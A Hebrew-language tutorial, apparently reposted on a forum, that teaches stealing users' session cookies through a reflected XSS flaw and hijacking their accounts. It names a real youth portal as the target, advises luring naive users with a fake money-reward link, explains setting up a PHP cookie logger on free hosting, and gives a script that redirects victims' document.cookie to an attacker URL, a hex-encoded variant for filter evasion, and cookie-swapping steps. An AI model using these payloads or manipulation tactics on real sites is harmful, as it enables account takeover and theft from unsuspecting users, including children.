|
באג ה XSS
הידע הדרוש למדריך : ידע בסיסי ביותר ב JavaScript. והרבה סבלנות
מהו באג ה-XSS? פירוש השם "XSS" הוא בעצם - "Cross Scripting Site" (ה C הוחלפה ב X מכיוון שהשם "CSS" כבר תפוס בתור שפה לעיצוב דפי אינטרנט)
באג ה XSS מנצל את שדות המילוי באתרים שונים, לדוגמא, כשאנחנו מחפשים מילה כלשהי במפתח חיפוש, אנו מזינים פיסת מידע מסוימת אל תוך משתנה מסוים, במקרה זה פיסת המידע היא מילת החיפוש.
לאחר מכן מערכת האתר משתמשת בפיסת המידע שאנו סיפקנו עבור המשתנה לצרכים שונים, במקרה זה המערכת שלחה את פיסת המידע אל קובץ החיפוש באתר, והפלט הוא למעשה תוצאות החיפוש, לאחר שהמערכת ביצעה התאמה בין המידע שסיפקנו למשתנה לבין המידע אשר שמור באתר.
אך מה יקרה במידה ונזין למשתנה מידע אשר יגרום לו להפעיל פקודת סקריפט? זהו בעצם באג הXSS.
במידה ונזין לתוך המשתנה פקודת סקריפט, באתרים מסוימים מערכת האתר תזהה את הסקריפט בתור סקריפט רגיל של האתר.במקרים אחרים מערכת האתר תזהה את המידע שהוזן אל תוך המשתנה בתור סקריפט ותחסום אותו.
בקיצור רב - באג ה XSS גורם לאתרים להריץ פקודות סקריפט. האומנם, בפועל, פקודות סקריפט בדף החיפוש אינן יכולות לעשות נזק רב לאתר, אך באמצעותן נוכל להריץ פקודות סקריפט אצל גולשים אשר יפתחו את הלינק.
לבאג זה ישנם שימושים רבים, במדריך זה נלמד רק על אחד מהם.
עוגיות (Cookies)
כשאנחנו מזינים שם משתמש וסיסמה,פיסות המידע הללו נשמרות בתור קבצי טקסט על מחשבנו ונקראות "קוקיז". כשאנו נכנסים לאותו אתר שוב, מערכת האתר בודקת בתיקיית הקוקיז של מחשבנו האם אכן קיימת עוגיה אשר מקושרת לאותו האתר.
במידה והאתר מוצא עוגיה כזו, מערכת האתר בודקת את פרטי העוגיה ומשתמשת בהם לצורך התחברות לאתר. כך בכל פעם שאנו נכנסים לאתר המסוים הזה, מתבצעת התחברות אוטומטית לאתר. כפי שהבנתם, במקרה זה, האתר משתמש בשם משתמש והסיסמה בכדי לשמור אותם על המחשב, ולעשות בהם שימוש חוזר.
לדוגמא : יוני נכנס לפורום החביב עליו, והתחבר בתור המשתמש - yoni22 ובסיסמה - 123456, הסיסמה מוצגת בתור כוכביות בפני צופי האתר, אך המידע נשמר על מחשבו של יוני, בתור טקסט מוצפן. לאחר חצי שעה בגלישה יוני צריך ללכת לבית הספר, ולצאת מהמחשב.
עכשיו ליוני יש שתי אפשרויות : 1. לצאת מן האינטרנט וללכת. 2. להתנתק מהאתר וכך העוגיות שנשמרו על מחשבו מקודם ימחקו, אך כשיחזור הביתה יצטרך להתחבר שוב.
סביר להניח שיוני פשוט יצא מהאתר, מכיוון שלאחר מכן, שיחזור מבית הספר ירצה להיכנס לאתר שוב.
הנוחות הזאת עולה בפרטיות, כך שהוריו יוכלו לאחר מכן להיכנס אל האתר בחשבון של יוני, ואנחנו מנצלי באג ה XSS נוכל לצפות בקוקיז המקודיים שלו.
העוגיות על מחשבו של יוני מקודדות, ולכאורה מונעות ממנו לצפות באופן ישיר וברור בסיסמה, אך עבור סוגי ההצפנות ישנם מחשבונים אשר קולטים צופן, והופכים אותו לטקסט בתווי ASCII, כפי שיוני כתב אותו, ברור ולא מקודד.
ברוב המקרים, בהזרקות XSS לא נוכל באופן ישיר לצפות בעוגיה. טכניקת ה XSS דורשת סבלנות, כריזמה, חוכמה ויצירתיות.
בכדי לגנוב את הקוקיז של יוני אנו צריכים שהוא יכנס לקישור מסוים, שההתחלה שלו היא כתובת הפורום, ובהמשך נמצא הסקריפט.
כך שאנחנו צריכים לשלוח הודעה משכנעת ליוני, המכילה מלל מסוים לשכנוע והלינק עצמו שישלח אלינו את העוגיות שלו. בפורום של יוני יש קניון, ועבור כל הודעה מקבלים כמה שקלים לקנייה בקניון. במקרה זה, כדאי לכתוב בתוכן המשכנע משהו הקשור לקניון, כמו -
"מצאתי לינק מגניב, שמביא לך 100 שקלים בקניון על כל לחיצה. הלינק פשוט מכוון את חשבונך אל דף Java המקושר לפורום, אשר גורם למערכת לשנות את משתנה הכסף במסד הנתונים של המערכת!, כנס ללינק כאן - *לינק*".
כפי שראיתם, בכדי לכתוב הודעה בעלת תוכן משכנע באמת צריך להיות : מתמחה לכאורה, לדבר במושגים שהגולש לא יבין במדויק [להיות חכם יותר מהגולש], ההודעה לא צריכה להיות גרנדיוזית, כמו - "אם תלחץ כאן תקבל מיליון שקל!", הודעות כאלו לא יעבדו על קהל הגולשים, מכיוון שציבור הגולשים לא עד כדי-כך תמים, ולמד מטעויות העבר.
כמו-כן, עדיף לעבוד על גולש תמים, שלא מבין הרבה במחשבים, וכך יש יותר סיכויים שייפול בפח.
כעת נגיע לחלק המעניין יותר בקטע - כיצד גונבים את הקוקיז? זה קטע יותר טכני וצריך בשבילו יותר טכניקה מאשר יצירתיות.
בJavaScript ישנה תגובה המציגה את הקוקיז אשר שמורים על מחשבך, הקשורים לאתר שדרכו אתם מריצים את הפקודה.
הנה דוגמא לשימוש בפקודה : alert(document.cookie), כמובן שצריך לכתוב את הפקודה בתוך דף סקריפט.
הפקודה הזאת רק מציגה בפניכם את העוגיות שלכם באתר הנוכחי בתור הודעה קופצת, אך עם שיפור של הפקודה ניתן לכוון את הפקודה לתוך קובץ PHP, כך שהעוגיות של הקורבן יגיעו היישר אל מסמך טקסט באינטרנט.
בכדי לפתוח מערכת הגונבת את עוגיות הגולש, אתם צריכים לפתוח שרת FTP, אני ממליץ על האתר - http://www.9999mb.com, כעת עליכם לעלות קבצים לשרת, וזאת מומלץ לעשות על ידי התוכנה "FlashFxp", שאותה ניתן להוריד דרך אתר התוכנה - www.flashfxp.com
לאחר שהתקנתם את התוכנה ונרשמתם לשרת FTP כל שהוא, התחברו לחשבון ה FTP שלכם דרך התוכנה.
כעת הקטינו את התוכנה, פתחו פנקס רשימות חדש והעתיקו אליו את המידע אשר רשום בטופס הבא : http://www.planetnana.co.il/shwin32/php1.txt.
בשורה השנייה איפה שכתוב - "$filename=" כתבו לאחר הגרשיים את שם הקובץ אליו העוגיות ישלחו.
לאחר מכן שמרו את הקובץ בפורמט PHP, ותיצרו פנקס רשימות חדש בשם שהגדרתם לקובץ שאליו המידע ישלח. תעלו את שני הקבצים לשרת ותתנו לפנקס הרשימות הראשות CHMOD מלאות (777).
הסבר קטן על הקבצים שהעלנו : הקובץ PHP הוא למעשה המערכת שמנווטת את הנתונים (עוגיות) שהגיעו אליה לעבור למסמך הטקסט הריק שהעלתם לשרת.
בסקריפט שאנו נשתול באתר הקורבן, אנו למעשה נשים הפנייה של האתר למערכת שלנו, בעוד שהסקריפט שולח לפרמטר GET שבמערכת את עוגיות האתר, והמערכת שולחת את העוגיות לפנקס הטקסט הריק.
כעת המערכת מוכנה, ורק מחכה לקבלת קוקיס חדשים. ראשית כל עליכם למצוא אתר פגיע, נקח לדוגמא את האתר TIPO - פורטל הנוער והילדים הגדול במדינה, ולא מאובטח בגרוש.
היכנסו לכתובת - www.tipo.co.il ותבדקו אם אכן יש שם באג XSS, בכך שתכתבו במנוע החיפוש של האתר מילה כלשהי
לאחר שהחיפוש הסתיים, תשימו לב שהכתובת תהיה "http://tipo.co.il/apps/click/TipoIndex_Search.asp?Club_Cat=0&IndexString=מילת החיפוש אשר כתבתם"
כעת סמנו את מילת החיפוש ותחליפו אותה בסקריפט כלשהו, הסקריפט הנפוץ ביותר לבדיקת באגי XSS הוא :
<script>alert("XSS HERE?")</script>
במידה ואכן יש שם פירצת XSS, תקפוץ לכם הודעת ALERT עם המלל - "XSS HERE?".
כעת עליכם להכיר את הסקריפט אשר צריך לשתול באתר, והוא להלן :
<script language="javascript">location.href='כתובת המערכת שלכם לגניבת קוקיז?cookie='+escape(document.cookie);</script>
לדוגמא : <script language=”javascript”location.href='http://www.members.lycos.co.uk/shwin32/goop.php?cookie='+escape(document.cookie);</script>
את השדה - "כתובת המערכת שלכם" פשוט תסמנו, בלי אף סימן אחר מחוץ אליו ותכתבו את כתובת מערכת ה PHP שהעלתם לשרת ה FTP.
כפי שאתם יכולים לראות בסקריפט הוא פשוט נותן הפנייה למערכת שלכם, בעוד שהמשתנה "cookie" אשר נמצא במערכת שלכם מקבל את העוגיות מהאתר הנוכחי, ומעביר אותן עלה.
במידה ותשימו את הסקריפט כמו שהוא במקום סקריפט ה "Alert", הוא אינו יעבוד. אך אם תעשו לו קידוד פשוט ב HEX הוא יעבוד מצויין. על קידודי HEX נדבר בהמשך.
עבור החוויה הנה הסקריפט עם קידוד HEX מוכן במקומות הרצויים :
%3CScRiPt%3Elocation%2ehref%3d%27כתובת המערכת שלכם כאן?cookie%3d%27%2bescape%28document%2ecookie%29%3b;%3C/ScRiPt%3E
תדביקו טקסט זה לאחר ה '=' שבכתובת שקיבלתם לאחר החיפוש, תרעננו את הדף, ותגיעו למערכת גניבת הקוקיס שלכם שלא כתוב בה הרבה.
אבל העוגיות שלכם מטיפו הגיעו הישר לדף הריק שיצרתם ממקודם. תכנסו לראות.
כעת מה שנשאר לכם לעשות זה לפרסם את הקישור לגולשים בטיפו, לקבל את העוגיות שלהם ולהחליף אותן בעוגיות שלכם.
בכדי לערוך עוגיות מומלץ להשתמש בכלי CookieEditor החינמי עבור FireFox, לכן עליכם להוריד את דפדפן FireFox גרסא 1.0.7, דרך הלינק הבא :
http://www.filehippo.com/download_firefox/?390
ואת הכלי לעריכת עוגיות דרך הלינק הבא :
https://addons.mozilla.org/en-US/firefox/downloads/file/2819/add_n_edit_cookies-0.2.1.2-fx+mz.xpi
ראשית כל התקינו את FireFox ולאחר מכן פתחו חלון חדש בפייר-פוקס, והעתיקו לשורת הכתובת שבו את כתובת הכלי לעריכת עוגיות, לאחר מכן הריצו אותו, סגרו את הדפדפן וכאשר תפתחו אותו מחדש הוא יופיע בלשונית "כלים".
טיפים
בכדי להיות בטוחים שעוגיות הגולשים יגיעו היישר אל קובץ הטקסט אשר שומר את העוגיות, רצוי לשים במערכת העוגיות טקסט או קובץ פלאש או כל דבר אחר, בכדי למשוך את עיני הגולשים לכמה שניות בודדות.
אני אוהב לשים שלט - “האתר עבר כתובת, אנא המתינו בזמן שהאתר מעביר אותכם לכתובת החדשה. בינתיים תוכלו לשחק במשחק פלאש נחמד : *תגית Embed למשחק פלאש כלשהו*.
בכדי לעשות זאת - תכנסו לקובץ של מערכת העוגיות, ולפני כל פקודות ה php שימו תגיות Html, אני ממליץ על התגית הבאה מכיוון שהיא הכי מושכת לעין, פשוט היכנסו לוואלה כיף ותיקחו כתובת של משחק פלאש :
<embed src=”כתובת סרטון\משחק פלא">
בהרבה מן המקרים שבהם ננסה להזריק סקריפט לאתרים, הסקריפט אינו יצליח לפעול, מכיוון שבאתרים הללו יש סינון נגד סקריפטים. במקרים כאלו יש מספר אופציות :
לקודד חלק מן הסקריפט ב HEX שהוא למעשה קידוד לכתובות אינטרנט, הוא הקידוד הנפוץ והיעיל ביותר כיום, בכדי לקודד תווי ASCII ל HEX ולהפך, הנה מחשבון מצויין :
http://centricle.com/tools/ascii-hex/
זכרו כי ברוב המקרים אם תקודדו את רוב הכתובת הסקריפט גם לא יפעיל חלק, רצוי לקודד רק סימנים "חשודים" שמערכת האתר יכולה לחסום את הסקריפט בגינם, כגון : ;, “, (,) וכדומה..
הרבה אתרים שמים גרשיים לפני תיבת החיפוש, בשביל שהמלל לא יוכל לרוץ כסקריפט. במידה וקידוד הHEX אינו פועל לכם, יש לנסות לכתוב < או <” לפני כל הסקריפט.
הרבה אתרים אשר יספקו לכם עוגיות יביאו לכם עוגיות מסובכות שאי אפשר לעשות איתן הרבה, בחלק זה אין הרבה הצעות טכניות, פשוט לחשוב בחוכמה, להשוות עוגיות, לברר בנוגע לשיטת ההצפנה אותה אתם מנסים לפצח וכדומה..
אבל תמיד זכרו כי עוגיות המקודדות בקידוד MD5 מכילות תמיד 32 תווים, כך שלפעמים יש אתרים שמוסיפים להן תווי סרק.
אם ברצונכם לפרוץ אל משתמש בטיפו, תחליפו רק את העוגיה הנגמרת כך – 125%2D120.
לא אני כתבתי!
| 
